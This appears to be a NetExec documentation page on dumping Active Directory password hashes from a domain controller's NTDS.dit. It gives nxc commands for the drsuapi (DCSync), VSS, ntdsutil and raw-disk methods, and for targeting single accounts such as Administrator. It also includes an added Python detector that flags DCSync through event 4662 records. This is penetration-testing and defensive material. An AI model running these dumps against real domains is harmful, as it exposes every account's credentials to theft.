Dump NTDS.dit

Dump the NTDS.dit from the target Domain Controller using the methods implemented in secretsdump.py.

{% hint style="danger" %}
Requires Domain Admin or Local Admin privileges on the target Domain Controller.
{% endhint %}

Two methods are available:

- drsuapi (default): uses the drsuapi RPC interface to create a handle, trigger replication, and, combined with additional drsuapi calls, convert the resulting linked lists into a readable format.
- vss: uses the Volume Shadow Copy Service.

Dump all users from the NTDS.dit

```bash
nxc smb <target> -u <username> -p <password> --ntds
nxc smb <target> -u <username> -p <password> --ntds --enabled
nxc smb <target> -u <username> -p <password> --ntds vss
```

{% hint style="info" %}
You can also DCSync using the computer account of the DC.
{% endhint %}
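Because legitimate directory replication is performed by the DC computer accounts named in the hint above, a defender can flag drsuapi replication requests (Security event 4662 exercising the DS-Replication-Get-Changes rights) that come from any other principal. The following is an added detection example, not part of NetExec or this page; the event records are constructed and the DC account names are assumptions.

```python
# Added example: flag DCSync-style replication requests in Windows Security
# event 4662 records. Sample events are constructed; DC names are assumptions.
import re

# Control-access rights that a drsuapi replication request exercises
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
CONTROL_ACCESS = 0x100  # "Control Access" bit in the 4662 AccessMask

GUID_RE = re.compile(r"\{?([0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12})\}?", re.I)


def dcsync_alerts(events, dc_accounts):
    """Return (account, source, rights) for 4662 events that request replication
    rights and are not issued by a known domain controller computer account.
    DC-to-DC replication is expected; any other principal is worth a look."""
    alerts = []
    known = {a.upper() for a in dc_accounts}
    for ev in events:
        if ev["EventID"] != 4662 or not (ev["AccessMask"] & CONTROL_ACCESS):
            continue
        rights = [REPLICATION_RIGHTS[g.lower()] for g in GUID_RE.findall(ev["Properties"])
                  if g.lower() in REPLICATION_RIGHTS]
        if not rights:
            continue
        if ev["SubjectUserName"].upper() in known:
            continue  # the DC's own computer account replicating: expected
        alerts.append((ev["SubjectUserName"], ev.get("IpAddress", "?"), rights))
    return alerts


# Constructed sample events (not real log data)
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "DC01$", "AccessMask": 0x100, "IpAddress": "10.0.0.5",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "jdoe", "AccessMask": 0x100, "IpAddress": "10.0.0.77",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "svc_backup", "AccessMask": 0x10,
     "Properties": "{bf967aba-0de6-11d0-a285-00aa003049e2}"},  # property read, not replication
]

if __name__ == "__main__":
    for who, src, rights in dcsync_alerts(SAMPLE_EVENTS, {"DC01$", "DC02$"}):
        print(f"ALERT: {who} from {src} requested {', '.join(rights)}")
```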

Dump a specific user only

```bash
nxc smb <target> -u <username> -p <password> --ntds --user Administrator
```

{% hint style="warning" %}
In environments with multiple domains (e.g., parent/child), specify the full NetBIOS form when using --user, such as --user NETBIOS/Administrator. This avoids ambiguity when the same username exists in different domains.
{% endhint %}

Dump NTDS using ntdsutil

There is also the ntdsutil module, which uses ntdsutil to dump the NTDS.dit and SYSTEM hive and then parses them locally with secretsdump.py.

```bash
nxc smb <target> -u <username> -p <password> -M ntdsutil
```

Dump NTDS using raw disk access

The ntds-dump-raw module uses raw disk access to extract the NTDS.dit and SYSTEM hive, reading directly from the physical drive, and then parses them locally with secretsdump.py.

```bash
nxc smb <target> -u <username> -p <password> -M ntds-dump-raw -o TARGET=NTDS
```

{% hint style="warning" %}
If you encounter command execution errors, specify an alternative execution method, such as --exec-method wmiexec or --exec-method atexec.
{% endhint %}